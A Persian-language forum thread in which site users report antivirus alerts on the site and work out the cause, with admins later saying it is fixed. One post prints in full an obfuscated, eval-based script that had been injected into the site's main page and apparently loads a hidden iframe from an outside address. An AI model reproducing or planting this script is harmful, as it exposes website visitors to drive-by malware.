رفتن به مطلب

اخطار وجود ویروس در سایت


evance
 اشتراک گذاری

Recommended Posts

a_.jar?b582f106 Detected: HEUR:Exploit.Script.Blocker.U 5/4/2012 3:32:59 AM

کاسپره من واسه ویروس اینو میده

لینک به دیدگاه
Share on other sites

  • ارسال 56
  • ایجاد شده
  • آخرین پاسخ

برترین ارسال کننده‌های این تاپیک

روزهای پر گپ و گفت

برترین ارسال کننده‌های این تاپیک

تصاویر ارسال شده

a_.jar?b582f106 Detected: HEUR:Exploit.Script.Blocker.U 5/4/2012 3:32:59 AM

کاسپره من واسه ویروس اینو میده

لینک به دیدگاه
Share on other sites

  • کاربر ویژه
ارسال شده در (ویرایش شده)

درود منم الان از دانشگاه اومدم تا سایت رو زدم بیاد بالا نورتن سکویریتیم دوبار اخطار ویروس بلوک کردن داد... با فایر فاکس هم بنده کار می کنم! اینم عکسش شاید بدردتون خورد من که سر در نیوردم! :D

ممنون

post-2742-0-65345300-1336090425_thumb.pngpost-2742-0-57325200-1336090444_thumb.pngpost-2742-0-68036400-1336091046_thumb.png

ویرایش شده توسط nima2007
لینک به دیدگاه
Share on other sites

منم دارم این مشکل رو با IE9 و firefox11 خود به خود چندین صفحه فیلترینگ باز میشه

واقعا بعضی وقتا اعصاب خورد کن می شه

لینک به دیدگاه
Share on other sites

یه چیز هست این کد رو به ابتدای صفحه اصلی سایت اضافه میکنه :

<script>if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='qgode'["substr"](4-2);w=this;e=w[f["substr"](11)+zz];n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#24.5#23.5#22#23.5#24.5#23.5#22#23.5#26#22#24.5#25.5#28#27#23#27#23#22.5#50.5#54.5#22#55#51#55#30.5#56.5#51.5#49#29.5#26.5#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#24.5#23.5#22#23.5#24.5#23.5#22#23.5#26#22#24.5#25.5#28#27#23#27#23#22.5#50.5#54.5#22#55#51#55#30.5#56.5#51.5#49#29.5#26.5#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));try{new 123;}catch(qw){h=-parseInt('012')/5;}for(i=6-2-1-2-1;i-583!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;if(e)e(""+q);}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

اینم نتیجه :

post-9497-0-69765100-1336133400_thumb.jpg

اینم به آخر صفحات بعد </html>

<script type="text/javascript">
window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'m;\/_\/apps-static\/_\/js\/gapi\/__features__\/rt=j\/ver=NHdbFd6CwIY.en.\/sv=1\/am=!Ze6NnRS0VYCICGRMrA\/d=1\/rs=AItRSTNf1sYcJ8S16x7CDDrF2LqPb_sHow';
window.___jsl.l=[];
window.___gpq=[];
window.gapi=window.gapi||{};
window.gapi.plusone=window.gapi.plusone||(function(){
 function f(n){return function(){window.___gpq.push(n,arguments)}}
 return{go:f('go'),render:f('render')}})();
function __bsld(){var p=window.gapi.plusone=window.googleapisv0.plusone;var f;while(f=window.___gpq.shift()){
 p[f]&&p[f].apply(p,window.___gpq.shift())}
p=window.gapi.plus=window.googleapisv0.plus;while(f=window.___gbq.shift()){
 p[f]&&p[f].apply(p,window.___gbq.shift())}
var parseTags = gapi.config.get('parsetags') || gapi.config.get('gwidget/parsetags');if (parseTags!=='explicit'){gapi.plusone.go();}}
window.___gbq=[];
window.gapi.plus=window.gapi.plus||(function(){
 function f(n){return function(){window.___gbq.push(n,arguments)}}
 return{go:f('go'),render:f('render')}})();
window['___jsl'] = window['___jsl'] || {};window['___jsl']['uc'] = 'http:\/\/apis.google.com\/js\/plusone.js';window['___jsl']['u'] = 'http:\/\/apis.google.com\/js\/plusone.js';window['___jsl']['f'] = ['googleapis.client','plusone','gcm_ppb'];(window['___jsl']['ci'] = (window['___jsl']['ci'] || [])).push({"gwidget":{"parsetags":"onload"},"lexps":[33,38,64,36,40,44,45,15,17,50,48,55,53,52,58,62,30,60],"report":{},"isPlusUser":true,"iframes":{"additnow":{"url":"https://apis.google.com/additnow/additnow.html"},"sharebox":{"params":{"json":"&"},"url":":socialhost:/:session_prefix:_/sharebox/dialog"},"plus":{"url":":socialhost:/u/:session_index:/_/pages/badge"},":socialhost:":"https://plusone.google.com","card":{"params":{"s":"#","userid":"&"},"url":":socialhost:/u/:session_index:/_/hovercard/card"},":signuphost:":"https://plus.google.com","plusone":{"url":":socialhost:/:session_prefix:_/+1/fastbutton","params":{"count":"","size":"","url":""},"preloadUrl":["https://ssl.gstatic.com/s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png"]}},"googleapis.config":{"requestCache":{"enabled":true},"methods":{"chili.people.list":true,"pos.plusones.list":true,"pos.plusones.get":true,"chili.people.get":true,"pos.plusones.insert":true,"chili.activities.list":true,"pos.plusones.delete":true,"chili.activities.get":true,"chili.activities.search":true,"pos.plusones.getSignupState":true},"versions":{"chili":"v1","pos":"v1"},"rpc":"/rpc","transport":{"isProxyShared":true},"sessionCache":{"enabled":true},"root-1p":"https://clients6.google.com","root":"https://www.googleapis.com","xd3":"/static/proxy.html","mobilesignupurl":"https://m.google.com/app/plus/oob?","developerKey":"AIzaSyCKSbrvQasunBoV16zDH9R33D88CeLr9gQ","auth":{"useInterimAuth":false}}});var gapi=window.gapi||{};gapi.client=window.gapi&&window.gapi.client||{};
window.gapi=window.gapi||{};
(function(){var z=void 0,A=void 0,B="___jsl",T="h",C="l",U="m",D="ms",V="ci",W="cu",X="c",Y="cm",Z="o",n="p",o="q",E="lc",F="Q",s="I",t="il",u="_",v="https://ssl.gstatic.com",$="/webclient/js",aa="/webclient/jsx/",G="https://apis.google.com",H=".js",ba="gcjs-3p",ca=/^(https?:)?\/\/([^/:@]*)(:[0-9]+)?(\/[\w.,:!=/-]*)(\?[^#]*)?(#.*)?$/,I=/^[?#]([^&]*&)*jsh=([^&]*)/,J="d",p="r",da="f",q="m",K="n",ea="sync",fa="callback",ga="config",ha="_ci",w="nodep",L="gapi.load: ",M=function(a,B){z&&z(a,B);throw L+
a+(b&&" "+B);},N=function(a){A&&A(a);var b=window.console;b&&b.warn(L+a)},ia=function(a,b,d){a=a[T];if(b=b&&I.exec(B)||d&&I.exec(d))try{a=decodeURIComponent(b[2])}catch(c){N("Invalid hint "+b[2])}return a},O=function(a){a.sort();for(var b=0;b<a.length;)!a[b]||b&&a[b]==a[b-1]?a.splice(b,1):++b},P=function(a,B){for(var d={},c=0;c<b.length;c++)d[b[c]]=!0;for(c=0;c<a.length;c++)if(!d.hasOwnProperty(a[c]))return!1;return!0},ja=function(a){if("loading"!=document.readyState)return!1;if("undefined"!=typeof window.___gapisync)return window.___gapisync;
if(a&&(a=a[ea],"undefined"!=typeof a))return a;for(var a=document.getElementsByTagName("meta"),b=0,d;d=a[b];++b)if("generator"==d.getAttribute("name")&&"blogger"==d.getAttribute("content"))return!0;return!1},Q=function(a,B){if(ja(a))document.write('<script src="'+encodeURI(B)+'"><\/script>');else{var d=b,c=document.createElement("script");c.setAttribute("src",d);c.async=!0;d=document.getElementsByTagName("script")[0];d.parentNode.insertBefore(c,d)}},R=function(a,b,d,c,e,f){var g=d.shift(),h;h=g==
p?v:g==q?c[D]||G:(h=d.shift())&&h.replace(/\/+$/,"");var j;g==p?(j=d.shift(),j=(j.indexOf(aa)?$+"/":"")+j):j=d.shift();var i=g==J,k=i&&d.shift()||ba,d=i&&d.shift();if(g==J)f=b,b=j,e=k,a="/"+a.join(":")+(f.length?"!"+f.join(":"):"")+H+"?container="+e+"&c=2&jsload=0",b&&(a+="&r="+B),"d"==d&&(a+="&debug=1");else if(g==p||g==da)f=b,b=j,a=(b.indexOf("/")?"/":"")+b+"/"+a.join("__")+(f.length?"--"+f.join("__"):"")+H;else if(g==q||g==K)b=j,a=a.join(",").replace(/\./g,"_").replace(/-/g,"_"),a=(b||"").replace("__features__",
a),a=e[w]?a.replace(/\/d=1(\/|$)/,"/d=0/"):a,f&&(a.match(/\/$/)||(a+="/"),a+="cb=gapi."+encodeURIComponent(f));else return N("Unknown hint type "+g),"";if(!h)return"";h+=a;a=h;f=c;c=ca.exec(a);if(!(b=!c))if(!(b=!!/\.\.|\/\//.test(c[4]))){b:if(b=a,c=c[2],g==p)c=b.substr(0,v.length)==v;else if(g==q)c=f[D]||G,c=b.substr(0,c.length)==c;else{g=f[u];if(c&&g){if(!/^[0-9a-zA-Z.-]+$/.test(c)){c=!1;break b}g=g.split(",");f=0;for(b=g.length;f<b;++f)if(e=g[f],d=c.lastIndexOf(e),(0==d||"."==e.charAt(0)||"."==
c.charAt(d-1))&&c.length-e.length==d){c=!0;break b}}c=!1}b=!c}b&&M("Invalid URI",a);return h},x=function(a,b,d){d&&(a[b]=a[b]||[]).push(d)},y=function(a){a[o]&&0<a[o].length&&(window.gapi.load||S).apply(null,a[o].shift())},r=function(a){if(a)try{a()}catch(B){return b}return null},m=window.gapi,ka=function(){if(m[u])return m[u];var a;if((a=Object.create)&&/\[native code\]/.test(a))a=a(null);else{a={};for(var b in a)a[b]=void 0}return m[u]=a},la=function(a,b,d,c,e){var f=e[F]=e[F]||[],g=e[E]=e[E]||
{};f.push([a,b,c]);m[d]=function(B){m[d]=void 0;if(!g[a]){g[a]=b;for(var b=f,c=g,i=e,k;b[0]&&c[b[0][0]];){var l=b.shift();c[l[0]].call(window,ka());c[l[0]]=!0;(l=r(l[1]))&&!k&&(k=l)}i[n]=void 0;y(i);if(k)throw k;}}},ma=function(a,B){var d=a[ha];x(b,V,d);d=a[ga];m.config?

کد دوم ظاهرا مربوط به گوگل پلاس است ولی چرا بعد html ؟

کد اول مربوط به ویروس هست.

ویرایش شده توسط php
لینک به دیدگاه
Share on other sites

من یه جا خوندم در فایل های htaccess و php.ini چک کنید چیز مشکوکی وجود نداشته باشه مثلا : auto_prepend_file =

http://www.precisesecurity.com/trojan/htmliframe-js-trj

ویرایش شده توسط php
لینک به دیدگاه
Share on other sites

برای من هم تازه این اخطارها ظاهر میشه! اصلا نمیشه صفحه اصلی سایت رو چک کرد! لطفا این مشکل رو حل کنید حداقل مطمئن میشیم از سایت نیست!

لینک به دیدگاه
Share on other sites

من یه مشکلی رو قبل از این جریانات با مدیر در جریان گزاشتم. صفحه ی اصلی سایت لیون باز می شد ولی یه هو می رفت!

یکی از add on های فایر فاکس رو پاک کردم درست شد. توی کورم هم مشکلی نداشتم.

لینک به دیدگاه
Share on other sites

من صبح با سایت فروشگاه مشکل نداشتم ولی الان دیگه نمی تونم وارد بشم . :wacko: :wacko: :wacko: .

...

لینک به دیدگاه
Share on other sites

مجدد سلام به دوستان عزیز

تا یکی دو روز قبل فقط با صفحه ی اول مشکل داشتم، ولی امروز با اکثر صفحات این مشکل پیش میاد

اینم پیغام نود 32

post-5901-0-55111200-1336136208_thumb.png

لینک به دیدگاه
Share on other sites

مشکل از طرف مدیر فنی سایت داره بررسی میشه . دارن سعی میکنن که زودتر برطرفش کنن .

لینک به دیدگاه
Share on other sites

دوستان مشکل برای من دیگه به وجود نیومد . ببینید که برای شما هم حل شده و شما اخطار ویروس نمی بینید ؟

لینک به دیدگاه
Share on other sites

مشکل برای من حل شده. من نود 32 آخرین ورژن با آپدیت دارم که از صبح این مشکل برام پیش اومده بود. ولی الان که سر زدم حل شده .

لینک به دیدگاه
Share on other sites

سلام

امیدوارم مشکل زودتر حل بشه

این صفحه ی پیوندها بنده روهم کلافه کرده.

ولی آنتی ویروسم آخرین ورژن هست و هیچ مشکلی رو نشون نمیده.

طبق گفته مدیر فنی هم فایر فاکس 11 رو به 12 آپدیتش کردم.

ولی باز هم صفحه ی پیوند ها باز میشه.

به نظرم این صفحه ی پیوندها برای صفحه هایی که توشون عکسی آپلود شده باشه باز میشه.

ویرایش شده توسط UP90
لینک به دیدگاه
Share on other sites

سلام

ساعت 19:45 دقیقه روز جمعه، من که دیگه مشکل رو ندارم، ظاهرا مشکل برطرف شده

خدا قوت به دوستانی که اینقدر سریع به مشکلات و مسائل سایت رسیدگی میکنن

ویرایش شده توسط Phoenix
لینک به دیدگاه
Share on other sites

  • کاربر ویژه
ارسال شده در (ویرایش شده)

برای منم مثل اینکه فط همون بود الان که مشکلی دیده نمی شه رون و خوب مثل همیشه انگار رفع شده یا بلوکه شده دیگه کاری ازش بر نمی اد... ممنون

ویرایش شده توسط nima2007
لینک به دیدگاه
Share on other sites

عرض ادب

ولی این مشکل برای بنده همچنان ادامه داره و رفع نشده

با تشکر

لینک به دیدگاه
Share on other sites

عرض ادب

ولی این مشکل برای بنده همچنان ادامه داره و رفع نشده

با تشکر

میشه لطفا تصویری از خطایی که میبینید بذارید ؟ ممنون میشم .

لینک به دیدگاه
Share on other sites

به محض بازکردن سایت لیون برای بنده صفحه پیوندها باز میشه کافیه یک جایی از لیون من کلیک بکنم که بلافاصله بعدش صفحه پیوندها ظاهر میشه هر از گاهی هم خود به خود میادش

لینک به دیدگاه
Share on other sites

اون یک مشکل دیگه هست . مشکلی که اینجا مهمتر بود مسئله ویروس توی هاست سایت بود که با باز کردن سایت ، آنتی ویروس پیغام میداد و سایت باز نمیشد . اگر کسی این مشکل رو داره بگه اینجا . مشکل صفحه پیوندها دقیقا مشخص نیست از کجاست . ولی پیگیرش هستن که حلش کنن .

لینک به دیدگاه
Share on other sites

ازشما ممنونم ولی فکر میکنم بعد از برسی موضوع ویروس به این قضیه صفحه پیوند ها پرداخته بشه چون خیلی داره اذیت میکنه گاه و بی گاه باز میشه و میره رو اعصاب ادم

از زحماتی که میکشید ممنونم

موفق باشید

لینک به دیدگاه
Share on other sites

  • کاربر ویژه

اون یک مشکل دیگه هست . مشکلی که اینجا مهمتر بود مسئله ویروس توی هاست سایت بود که با باز کردن سایت ، آنتی ویروس پیغام میداد و سایت باز نمیشد . اگر کسی این مشکل رو داره بگه اینجا . مشکل صفحه پیوندها دقیقا مشخص نیست از کجاست . ولی پیگیرش هستن که حلش کنن .

حامد جان مشکل از گزینه لایک فیسبوک هستش که زیر تاپیک ها می بینیم 100% مطمئن هستم

توی تنظیمات بوکمارت IPB باید غیر فعال بشه

لینک به دیدگاه
Share on other sites

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .
توجه: مطلب ارسالی شما پس از تایید مدیریت برای همه قابل رویت خواهد بود.

مهمان
ارسال پست در این تاپیک...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

 اشتراک گذاری


×
  • اضافه کردن...